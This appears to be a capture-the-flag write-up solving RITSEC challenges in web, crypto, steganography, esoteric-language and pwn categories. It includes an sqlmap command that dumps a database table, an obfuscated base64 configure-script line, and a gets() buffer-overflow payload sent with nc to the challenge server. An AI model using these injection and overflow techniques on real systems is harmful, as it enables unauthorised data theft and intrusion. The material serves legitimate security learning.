Space Force
The Space Force has created a portal for the public to learn about and be in awe of our most elite Space Force Fighters. Check it out at fun.ritsec.club:8005!
Opening the site, it appears to offer a search function. Capture the request and try injecting into it:
```http
POST /index.php HTTP/1.1
Host: fun.ritsec.club:8005
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fun.ritsec.club:8005/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Connection: keep-alive
Upgrade-Insecure-Requests: 1

name=The+Javelin
```
sqlmap -r burp.txt -D challenge -T spaceships --dump
flag:RITSEC{hey_there_h4v3_s0me_point$_3ny2Lx}
Burn the candle on both ends
The usual routine: a zip is hidden inside the file, so just carve it out.
It is password-protected, though; after a very long brute force the password turns out to be stegosaurus.
flag:RITSEC{8U51N355-1N-7H3-Fr0N7-P4r7Y-1N-7H3-84CK}
I am a Stegosaurus
Downloading the image, it will not open on Linux, probably because its height or width was altered. On Windows it opens directly, and the flag sits at the bottom of the image.
flag:RITSEC{th1nk_0uts1d3_th3_b0x}
Nobody uses the eggplant emoji
This one needs some lateral thinking: the ciphertext is made entirely of emoji.
Challenge:
Notice that a few underscores are mixed in among the emoji, so we can try mapping each distinct emoji to a different letter, which gives:
ABCDEFCGHAIJCDEFCKLMCNELGHDCEBCGHMCBOKPCBALQGCDEFCRFQGCKIQNMLCGHMQMCGHLMMCSFMQGAEIQTCNHKGCAQCDEFCIKRMUCNHKGCAQCDEFLCSFMQGUCNHKGCAQCGHMCKALCQVMMWCXMOEYAGDCEBCKICFIOKWMICQNKOOENTCDEFLCBOKPCAQZCKBLAYKI[EL[MFLEVMKI[QNKOOEN[NEN[GHMLMQ[K[WABBMLMIYMC
Frequency analysis then turns this into:
IFSYOUSTHINGSYOUSARESWORTHYSOFSTHESFLAMSFIRDTSYOUSJUDTSANDWERSTHEDESTHREESQUEDTIONDPSWHATSIDSYOUSNAJEVSWHATSIDSYOURSQUEDTVSWHATSIDSTHESAIRSDBEEKSZELOCITYSOFSANSUNLAKENSDWALLOWPSYOURSFLAMSIDXSAFRICAN[OR[EUROBEAN[DWALLOW[WOW[THERED[A[KIFFERENCES
After substituting the remaining characters:
flag:RITSEC{african_or_european_swallow_wow_theres_a_difference}
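The second stage of the decode, as an added example written for this write-up (not the author's script): it ranks symbols of the stage-one text by frequency, which singles out `S` as the word separator, then applies the hand-derived corrections (FLAM to FLAG, FIRDT to FIRST, DBEEK to SPEED, and so on) in one simultaneous pass. The stage-one string is the one quoted above; the `FIXES` table is my reading of it.

```python
from collections import Counter

# Stage-one text from the write-up: every distinct emoji replaced by a letter,
# with "[" standing where the original underscores were.
STAGE1 = (
    "IFSYOUSTHINGSYOUSARESWORTHYSOFSTHESFLAMSFIRDTSYOUSJUDTSANDWERSTHEDES"
    "THREESQUEDTIONDPSWHATSIDSYOUSNAJEVSWHATSIDSYOURSQUEDTVSWHATSIDSTHES"
    "AIRSDBEEKSZELOCITYSOFSANSUNLAKENSDWALLOWPSYOURSFLAMSIDXSAFRICAN[OR["
    "EUROBEAN[DWALLOW[WOW[THERED[A[KIFFERENCES"
)


def frequency_ranking(text):
    """Symbols ordered from most to least frequent; in English prose the top one
    is almost always the word separator, which is how S is identified as space."""
    return [sym for sym, _ in Counter(text).most_common()]


# Stage-two corrections read off by hand from English spelling and context
# (constructed here; e.g. FLAM -> FLAG, FIRDT -> FIRST, DBEEK -> SPEED).
# Kept in one dict so every symbol is replaced simultaneously: G -> K while
# K -> D, which a chain of str.replace() calls would get wrong.
FIXES = {"S": " ", "D": "S", "G": "K", "M": "G", "J": "M", "B": "P",
         "K": "D", "Z": "V", "P": ".", "V": "?", "X": ":", "[": "_"}


def substitute(text, mapping):
    """Apply a monoalphabetic substitution; symbols not in the map pass through."""
    return "".join(mapping.get(ch, ch) for ch in text)


def recover_flag(text, fixes=FIXES):
    """Decode the text and wrap the part after 'FLAG IS:' in RITSEC{...}."""
    plain = substitute(text, fixes)
    body = plain.split("FLAG IS: ", 1)[1].strip()
    return "RITSEC{" + body.lower() + "}"


if __name__ == "__main__":
    print(frequency_ranking(STAGE1)[:5])
    print(substitute(STAGE1, FIXES))
    print(recover_flag(STAGE1))
```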
Who drew on my program?
Download the image.
A quick search on Baidu shows this seems to be a reused challenge, very similar to https://github.com/dqi/ctf_writeup/tree/master/2015/tmctf/crypto200
There too some key information is crossed out and you have to recover the flag. Let's look at that write-up's solver:
```python
#!/usr/bin/python
from Crypto.Cipher import AES
import binascii
import string
import itertools

# given
bKEY = "5d6I9pfR7C1JQt"

# use null bytes to minimize effect on output
IV = "\x00" * 16


def encrypt(message, passphrase):
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.encrypt(message)


def decrypt(cipher, passphrase):
    aes = AES.new(passphrase, AES.MODE_CBC, IV)
    return aes.decrypt(cipher)


pt = "The message is protected by AES!"
ct = "fe000000000000000000000000009ec3307df037c689300bbf2812ff89bc0b49"

# find the key using the plaintext and ciphertext we know, since the IV has no
# effect on the decryption of the second block
for i in itertools.product(string.printable, repeat=2):
    eKEY = ''.join(i)
    KEY = bKEY + eKEY
    ptc = decrypt(binascii.unhexlify(ct), KEY)
    if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]:
        print "Got KEY: " + str(KEY)
        fKEY = KEY

pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:]
print "Decrypting with CT mostly zeroes gives: " + pt2
print "Should be: " + binascii.hexlify(pt[16:])

# we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i]),
# since we chose ct 00 in all the positions we are going to recover
answer = ""
for i in range(13):
    pi = pt[17 + i]                 # letters from the plaintext
    pti = pt2[2 * i + 2:2 * i + 4]  # 2 hex letters from decryption of second block
    answer += "%02X" % (ord(pi) ^ int(pti, 16))
rct = ct[0:2] + answer.lower() + ct[28:]
print "Which means CT was: " + rct

# now we can decrypt the recovered ct and xor against the pt to recover the IV
wpt = decrypt(binascii.unhexlify(rct), fKEY)
IV = ""
for i in range(16):
    p = ord(pt[i]) ^ ord(wpt[i])
    IV += "%02X" % p
IV = binascii.unhexlify(IV)

# sanity check:
aes = AES.new(fKEY, AES.MODE_CBC, IV)
print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct))

# We won!
print "The IV is: " + IV
```
Change bKEY (and ct) to the values from our challenge; the rest of the script stays the same:
```python
# given
bKEY = "9aF738g9AkI112"
ct = "9e00000000000000000000000000436a808e200a54806b0e94fb9633db9d67f0"
```
flag:RITSEC{b4dcbc#g}
Talk to me
Join the channel: https://discord.gg/p7tHuSq
Search for RITSEC.
flag:RITSEC{its_like_irc-but_with_2_much_javascript}
Patch Patch
Look at the patch-patch-patch file:
diff -ur patch-2.7.1/src/patch.c patch-2.7.1.1/src/patch.c --- patch-2.7.1/src/patch.c 2018-11-02 01:12:30.625613158 -0400 +++ patch-2.7.1.1/src/patch.c 2018-11-02 01:13:21.498608985 -0400 @@ -1953,9 +1953,9 @@ fatal_exit (int sig) { cleanup (); -#ifdef backdoor - printf("Looks like we got a vulnerability here"); -#endif + +/* Removed a super bad vuln here */ + if (sig) exit_with_signal (sig);
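Review bot: the replacement comment `/* Removed a super bad vuln here */` documents nothing about what was removed, and what was removed is only a `printf` wrapped in `#ifdef backdoor`, which is not compiled unless `backdoor` is defined; in a default build of patch-2.7.1 this hunk changes no behaviour, and it also leaves a stray empty `+` line before the comment. If the point is to retire the `backdoor` build option, say so in the comment and drop the blank line; the `if (sig)` / `exit_with_signal (sig)` path that follows is untouched.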
Nothing useful there. Look instead at patch-2.7.1-10.el7.centos.src: unpack all of it, and the configure script inside patch-2.7.1 contains something strange:
```bash
TEST=$(echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`)
```
It is a bash fragment; let's try running it:
```
$ echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`
RITSEC{VULNS_4R3_BAD_}
```
flag:RITSEC{VULNS_4R3_BAD_}
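The same line can be unpacked statically, which is how you would treat an obfuscated snippet in a build script you did not write: decode what each `echo -e` would print and what the hidden command would do, without ever executing it. This is an added example, not part of the write-up; the input is the configure line quoted above.

```python
import base64
import re

# The obfuscated assignment copied from the configure script shown above.
OBFUSCATED = (
    r'TEST=$(echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54'
    r'\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | '
    r'`echo -e "\x62\x61\x73\x65\x36\x34" -d`)'
)

HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')
# A double-quoted string made entirely of \xNN escapes, i.e. one echo -e argument.
QUOTED_ESCAPES = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')


def decode_hex_escapes(s):
    """Turn a run of \\xNN escapes (what `echo -e` would print) into bytes."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(s))


def unpack_obfuscated_line(line):
    """Recover the hidden command name and the data it would be fed, without running
    anything. Returns (command, payload, decoded_value); decoded_value is None when
    the hidden command is something other than base64."""
    strings = [decode_hex_escapes(s).decode() for s in QUOTED_ESCAPES.findall(line)]
    if len(strings) != 2:
        raise ValueError("expected exactly two escaped strings, got %d" % len(strings))
    payload, command = strings
    value = base64.b64decode(payload).decode() if command == "base64" else None
    return command, payload, value


if __name__ == "__main__":
    command, payload, value = unpack_obfuscated_line(OBFUSCATED)
    print("hidden command:", command)
    print("payload:", payload)
    print("decoded:", value.strip())
```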
What_Th._Fgck
The challenge gives only this:
OGK:DI_G;lqk"Kj1;"a"yao";fr3dog0o"vdtnsaoh"patsfk{+
This is text typed on a Dvorak keyboard layout; below is the Dvorak layout diagram.
Decode it directly with a tool
to get the plaintext RITSEC{Isn't”Th1s”a”far”sup3eri0r”keyboard”layout?}
Replace the double quotes with underscores and that's it.
flag:RITSEC{Isn't_Th1s_a_far_sup3eri0r_keyboard_layout?}
RIP
This one gives an image and a piece of ciphertext:
+[----->+++<]>+.++++++++++++..----.+++.+[-->+<]>.-----------..++[--->++<]>+...---[++>---<]>.--[----->++<]>+.----------.++++++.-.+.+[->+++<]>.+++.[->+++<]>-.--[--->+<]>-.++++++++++++.--.+++[->+++++<]>-.++[--->++<]>+.-[->+++<]>-.--[--->+<]>-.++[->+++<]>+.+++++.++[->+++<]>+.----[->++<]>.[-->+<]>++.+++++++++.--[------>+<]>.--[-->+++<]>--.+++++++++++++.----------.>--[----->+<]>.-.>-[--->+<]>--.++++.---------.-.
The ciphertext is a Brainfuck program; running it gives a link: https://www.youtube.com/watch?v=F6LYOfeSWNM
That leads nowhere, so back to the image. The odd thing about it is the border of small coloured squares; a quick search shows these are the Piet programming language, so we crop away the rest of the image
and decode it online:
flag:RITSEC{WH4AT_TH3_P13T_1337}
Check out this cool filter
No idea on this one; only after reading a top player's write-up did I understand:
```python
from PIL import Image

img = Image.open('CheckOutThisFilter.png').convert('RGB')
w, h = img.size
codes = []
for y in range(0, h):
    for x in range(0, w):
        r, g, b = img.getpixel((x, y))
        codes.append(b)  # collect the blue channel value of every pixel, row by row
codes = codes[:51]
flag = ''
for code in codes:
    flag += chr(code - 13)
print(flag)
```
flag:RITSEC{TIL_JPEG_COMPRESSION_MESSES_WITH_RGB_VALUES}
music.png
This one also opened my eyes: it is a new kind of music called "bytebeat".
Use a script to extract the code from the image:
```python
from PIL import Image

img = Image.open('music.png').convert('RGB')
w, h = img.size
r_str = ''
g_str = ''
b_str = ''
for y in range(0, h):
    for x in range(0, w):
        r, g, b = img.getpixel((x, y))
        r_str += chr(r)
        g_str += chr(g)
        b_str += chr(b)
s = r_str[:32] + g_str[:38] + b_str[:66]
print(s)
```
This gives:
(t<<3)*[8/9,1,9/8,6/5,4/3,3/2,0][[0xd2d2c7,0xce4087,0xca32c7,0x8e4008][t>>14&3.1]>>(0x3dbe4687>>((t>>10&15)>9?18:t>>10&15)*3&7.1)*3&7.1]
Run it with an online tool.
It plays a tune, and song recognition identifies it as "Never Gonna Give You Up".
So the flag is: RITSEC{never_gonna_give_you_up}
For an introduction to bytebeat, click here.
ezpwn
Open it in IDA.
The code is roughly as follows:
```c
#include <stdio.h>

int main(void) {
    int x = 0;
    char buffer[24];   /* size assumed from the 24-byte offset found below; IDA showed a single char */
    FILE *f;
    int y = 0;

    puts("Please enter your API key");
    gets(buffer);      /* unbounded read: input past the buffer overwrites x on the stack */
    f = fopen("flag.txt", "r");
    if (x == 1) {
        while (y != -1) {
            y = fgetc(f);   // Acts like the decrement
            putchar(y);
        }
        fclose(f);
    }
    printf("%d\n", x);
    return 0;
}
```
x is initialised to 0, but the flag is only read when x == 1. The key function is gets, which lets us overwrite x. First we determine the offset:
```
└──╼ $./ezpwn
Please enter your API key
aaaabaaacaaadaaaeaaafaaagaaaha
1633771879
```
cyclic gives an offset of 24. Write a flag.txt locally and build the payload: python -c 'print "A"*24 +"\x01" ' | ./ezpwn
```
└──╼ $python -c 'print "A"*24 +"\x01" ' | ./ezpwn
Please enter your API key
flag{666666}
1
```
Works locally.
```
root@kali:~/pwn# python -c "print 'a'*24 + '\x01\x00\x00\x00'"| nc fun.ritsec.club 8001
Please enter your API key
RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}1
```
Got the flag.
flag:RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}
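The offset step above, as an added example: a minimal reimplementation of the cyclic / cyclic_find idea (my own code, not pwntools'). It builds the same a-z de Bruijn pattern the write-up sent, and maps the value ezpwn printed for x, 1633771879, back to the offset of the four input bytes that landed in it.

```python
import itertools
import string
import struct


def de_bruijn(alphabet, n):
    """Lazily yield the de Bruijn sequence B(k, n) over `alphabet` (FKM construction):
    every window of n symbols occurs exactly once, so a window pins down its offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` characters of the a-z pattern ('aaaabaaacaaad...')."""
    return "".join(itertools.islice(de_bruijn(string.ascii_lowercase, n), length))


def cyclic_find(value, n=4, search_len=4096):
    """Offset of the n-byte window that ended up in a leaked variable or register.
    `value` may be the window itself or the int the program printed (little-endian,
    as it was laid out in memory). Returns -1 if the window is not in the pattern."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    if isinstance(value, bytes):
        value = value.decode()
    return cyclic(search_len, n).find(value)


if __name__ == "__main__":
    # The write-up fed cyclic(30) to ezpwn and it printed x == 1633771879.
    print(cyclic(30))
    print(cyclic_find(1633771879))   # 24: input bytes 24..27 ("gaaa") overwrote x
```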